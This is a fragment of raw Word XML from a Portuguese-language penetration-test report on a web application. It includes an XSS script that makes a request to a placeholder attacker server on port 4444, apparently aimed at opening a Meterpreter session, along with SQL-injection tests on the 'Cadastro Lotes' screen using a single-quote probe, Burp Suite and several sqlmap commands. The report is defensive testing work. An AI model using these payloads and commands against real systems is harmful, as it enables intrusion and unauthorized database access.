    <w:p w:rsidR="008C6DC7" w:rsidRPr="00E31790" w:rsidRDefault="008C6DC7" w:rsidP="00E3179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E31790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">r = new XMLHttpRequest(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00E31790" w:rsidRDefault="008C6DC7" w:rsidP="00E3179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E31790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r.open("GET",’http://IP_do_servidor:4444’,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00E31790" w:rsidRDefault="008C6DC7" w:rsidP="00E3179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E31790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>r.send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00E31790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E31790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E31790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31790" w:rsidRDefault="00E31790" w:rsidP="00E3179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E31790" w:rsidRPr="00F15F82" w:rsidRDefault="00E31790" w:rsidP="00E3179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31790" w:rsidRPr="00F15F82" w:rsidRDefault="00E31790" w:rsidP="00E3179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esperado é que a aplicação realize tratamento para impedir o código de ser executado.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31790" w:rsidRDefault="005967D5" w:rsidP="00E3179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E31790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sistema </w:t>
      </w:r>
      <w:r w:rsidR="00557D26" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">não </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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Independente da sessão do Meterpreter não ser aberta, o código conseguiu ser inserido e executado.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E31790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4</w:t>
      </w:r>
      <w:r w:rsidR="00E31790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.3.3.3</w:t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Tela C</w:t>
      </w:r>
      <w:r w:rsidR="0049098B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">adastro Lotes </w:t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– Exploração via SQL Injection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22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Tentar realizar consultas não autorizadas no banco de dados por meio da injeção de SQL nos cam</w:t>
      </w:r>
      <w:r w:rsidR="0049098B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pos da tela de Cadastro Lotes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49098B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Descobrir se o campo Marca/Fabricante é vulnerável a SQL Injection através das aspas simples.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9B1DC9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Comando</w:t>
      </w:r>
      <w:r w:rsidR="0049098B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizado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: 1 ‘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49098B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uso de aspas simples aqui é o teste mais básico de vulnerabilidade de um campo para SQL Injection. Imagina-se que haja por baixo uma instrução SQL que possua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where param1 = &lt;parametro_na_interface&gt; and …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49098B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Caso a aplicação não fizesse o devido tratamento do comando inserido e a instrução fosse ser modificada para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where param1  = 1 ‘ . </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O que ocasionaria um erro de SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46C6B" w:rsidRPr="00F15F82" w:rsidRDefault="00D46C6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F15F82" w:rsidRDefault="00D46C6B" w:rsidP="0049098B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3F0DBB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D46C6B" w:rsidRPr="00F15F82" w:rsidRDefault="00D46C6B" w:rsidP="0049098B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realize o tratamento dos caracteres para impedir que sejam interpretados como</w:t>
      </w:r>
      <w:r w:rsidR="006C08DA" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> trecho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9098B" w:rsidRDefault="005967D5" w:rsidP="0049098B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D76012" w:rsidP="0049098B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  <w:r w:rsidR="00594AD8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Colocando 1‘ no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campo </w:t>
      </w:r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Marca/Fabricante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9098B" w:rsidRPr="00F15F82" w:rsidRDefault="0049098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D918FF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Usar a fe</w:t>
      </w:r>
      <w:r w:rsidR="00C52795">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rramenta Sqlmap para realizar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teste</w:t>
      </w:r>
      <w:r w:rsidR="00C52795">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s de injeção de SQL na página Cadastro Lotes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00C52795" w:rsidP="00D918FF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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>través da ferramenta Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, capturar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a requisição POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>realizada para o acesso à página em questão e salvar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em um arquivo a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parte para </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">que esses dados possam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ser utilizado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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pelo Sqlmap </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>posteriormente. [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2]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FB2992">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1418"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="851" w:firstLine="56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>Comando utilizado: sqlmap -r params -p --current-db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71369" w:rsidRDefault="00771369" w:rsidP="00D918FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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“sqlmap” executa a ferramenta Sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00D918FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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comando “-r” informa que as instruções do ataque devem ser carregadas no arquivo params.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00C52795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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“-p” indica o parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00510DD2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a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ser injetado</w:t>
      </w:r>
      <w:r w:rsidR="007E2011">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> pelo Sqlmap</w:t>
      </w:r>
      <w:r w:rsidR="00C52795">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, que nesse caso corresponde</w:t>
      </w:r>
      <w:r w:rsidR="00FD3807">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00C306C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> um</w:t>
      </w:r>
      <w:r w:rsidR="00FD3807">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> parâmetro de entrada de dados </w:t>
      </w:r>
      <w:r w:rsidR="00C306C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utilizado pela</w:t>
      </w:r>
      <w:r w:rsidR="00FD3807">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tela</w:t>
      </w:r>
      <w:r w:rsidR="00C306C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> explorada</w:t>
      </w:r>
      <w:r w:rsidR="00C52795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D918FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1418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“--current-db” solicita que o Sqlmap que tente descobrir qual o banco da aplicação alvo.</w:t>
      </w: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0AAD" w:rsidRPr="00F15F82" w:rsidRDefault="00190AAD" w:rsidP="009F7A3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F0DBB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00190AAD" w:rsidRPr="00F15F82" w:rsidRDefault="00190AAD" w:rsidP="009F7A3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</w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s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parâmetro</w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="003F0DBB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, não permitindo que eles sejam vulneráveis à injeção de SQL.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B2992" w:rsidRDefault="005967D5" w:rsidP="009F7A3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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="009F7A3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Erro na ferramenta. </w:t>
      </w:r>
      <w:r w:rsidR="00FD3807">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O parâmetro não foi indicado corretamente no comando utilizado. Dessa forma, o </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sqlmap não reconhece</w:t>
      </w:r>
      <w:r w:rsidR="00FD3807">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u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o parâmetro, que está no arquivo indicado no comando.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771369" w:rsidRPr="00F15F82" w:rsidRDefault="0077136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3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00F02825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Alterar o comando utilizado na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2 para </w:t>
      </w:r>
      <w:r w:rsidR="00C306C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>indicar corretamente</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00C306C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a ser testado pelo Sqlmap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771369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O comando do Sqlmap pede que seja informado um parâmetro para possível injeção de SQL.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F02825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>Comando utilizado: sqlmap -r params -p descricao --current-db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02825" w:rsidRDefault="00F02825" w:rsidP="00F0282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1843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“sqlmap” executa a ferramenta Sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00F0282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1843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r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>params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F0282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1843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“-p” indica o parâmetro que deve ser injetado</w:t>
      </w:r>
      <w:r w:rsidR="007E2011">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00510DD2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pelo Sqlmap, que nesse caso corresponde a um parâmetro de entrada de dados utilizado pela tela explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00F0282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1843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“descrição” é o parâmetro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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00F0282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1843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“--current-db” comando utilizado para descobrir qual o banco da aplicação alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00190AAD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94228B" w:rsidRPr="00F15F82" w:rsidRDefault="0094228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87AAF" w:rsidRPr="00F15F82" w:rsidRDefault="00190AAD" w:rsidP="00F87AAF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lastRenderedPageBreak/>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r w:rsidR="00F87AAF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101063" w:rsidRPr="00F15F82" w:rsidRDefault="00190AAD" w:rsidP="00F87AAF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Espera-se que a aplicação faça o tratamento do parâmetro</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC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“descricao”</w:t>
      </w:r>
      <w:r w:rsidR="0094228B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, não permitindo que ele seja vulnerável à injeção de SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094228B" w:rsidRPr="00F15F82" w:rsidRDefault="0094228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87AAF" w:rsidRDefault="005967D5" w:rsidP="00F87AAF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F15F82" w:rsidRDefault="00D76012" w:rsidP="00F87AAF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101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> O</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00707948" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>descricao</w:t>
      </w:r>
      <w:r w:rsidR="00707948" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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16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BC1742" w:rsidRPr="00F15F82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C1742" w:rsidRPr="00F15F82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C1742" w:rsidRPr="00F15F82" w:rsidRDefault="00E4538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2813685</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3952875" cy="180975"/>
                <wp:effectExtent l="0" t="0" r="28575" b="2857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75" cy="18097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BC983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6" type="#_x0000_t109" style="position:absolute;margin-left:38.7pt;margin-top:221.55pt;width:311.2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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BC1742"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49A29FC" wp14:editId="59498F0C">
            <wp:extent cx="5400040" cy="4133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D02F49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16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aplicação SQL Injection via Sqlmap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4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="005E45A3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Alterar o comando utilizado nas </w:t>
      </w:r>
      <w:r w:rsidR="00D02F49">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00925B9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>essões</w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s anteriores para incluir o parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>validade”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8"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5E45A3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Tentar injeção de SQL no parâmetro “validade”.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510DD2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>Comando</w:t>
      </w:r>
      <w:r w:rsidR="005E45A3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizado</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: sqlmap -r params -p validade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7804EC" w:rsidRDefault="007804EC" w:rsidP="00630433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“sqlmap” executa a ferramenta Sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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lastRenderedPageBreak/>
        <w:t xml:space="preserve">O comando “-r” indica ao programa que as instruções do ataque devem ser carregadas no arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>params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“-p” indica o </w:t>
      </w:r>
      <w:r w:rsidR="00510DD2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">parâmetro a ser injetado </w:t>
      </w:r>
      <w:r w:rsidR="00510DD2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pelo Sqlmap, que nesse caso corresponde a um parâmetro de entrada de dados utilizado pela tela explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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“validade” é o parâmetro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190AAD" w:rsidRPr="00F15F82" w:rsidRDefault="00190AA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5E45A3" w:rsidRDefault="005E45A3" w:rsidP="00510DD2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1415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Default="00190AAD" w:rsidP="00510DD2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1415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  <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “validade”</w:t>
      </w:r>
      <w:r w:rsidR="00925B9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e não permita que o campo seja injetável</w:t>
      </w:r>
      <w:r w:rsidR="00510DD2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> à SQL</w:t>
      </w:r>
      <w:r w:rsidR="00925B9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00925B9A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00510DD2" w:rsidRPr="00F15F82" w:rsidRDefault="00510DD2" w:rsidP="00925B9A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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
